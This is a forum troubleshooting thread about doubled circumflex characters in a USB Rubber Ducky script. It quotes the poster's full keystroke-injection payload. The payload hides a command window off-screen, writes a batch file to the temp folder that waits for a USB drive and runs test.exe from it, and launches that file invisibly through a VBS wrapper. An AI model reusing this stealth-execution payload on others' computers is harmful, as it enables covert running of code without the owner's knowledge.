Jump to content

Recommended Posts

Posted

So I'm writing into a BAT file in order to achieve file execution.

This is one line in that BAT file:

for /f %%d in ('wmic volume get driveletter^, label ^| findstr "USBSTICK"') do set ddrv=%%d

However, all the ^ are replaced with ^^. So in the end, the code is invalid. Also, even when writing in the forums right now in my browser, I still enter ^^ when pressing circumflex once.

What happened?

This is my ducky code:

DEFAULT_DELAY 50
DELAY 2000
GUI r
DELAY 750
STRING cmd /Q /D /T:78 /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750

ALT SPACE
DOWNARROW
ENTER
DOWNARROW
REPEAT 100
ENTER

STRING cd %TEMP%
ENTER

STRING erase /Q test1.bat
ENTER
STRING copy con test1.bat
ENTER
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "USBSTICK"') do set ddrv=%%d
ENTER
STRING if Exist %ddrv% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 15
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
STRING START %ddrv%\test.exe
ENTER
CONTROL z
ENTER

STRING erase /Q test1.vbs
ENTER
STRING copy con test1.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL z
ENTER

STRING wscript.exe test1.vbs test1.bat
ENTER
STRING exit
ENTER
Posted

Some initial questions:

1) Version of the encoder you used?

2) Version of the firmware you used?

3) Did you use a specific language map?

Posted

Can you try the offline encoders? I want to figure out what version this bug might have crept in.

Thanks

~

Posted

Also, as an update, I tested it again. Apparently this issue only occurs the second time I insert the USB drive into my computer. But then, the "^^" is consistent with all applications on my computer, CMD, notepad, even on my browser as I'm typing here.

^^

Posted

Just look at the ducky decode website, any newer encoders are now on google drive.

Another way is to post the inject.bin file; i can easily reverse it; or hopefully others can, I'm pretty sporadic on here these days

Posted

I just downloaded and used the current offline encoder and I figured out that the error lies somewhere else in another application. It has nothing todo with the rubber ducky.

Thanks for your friendly advice, tho!

Good to know there's an offline encoder anyway :)

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...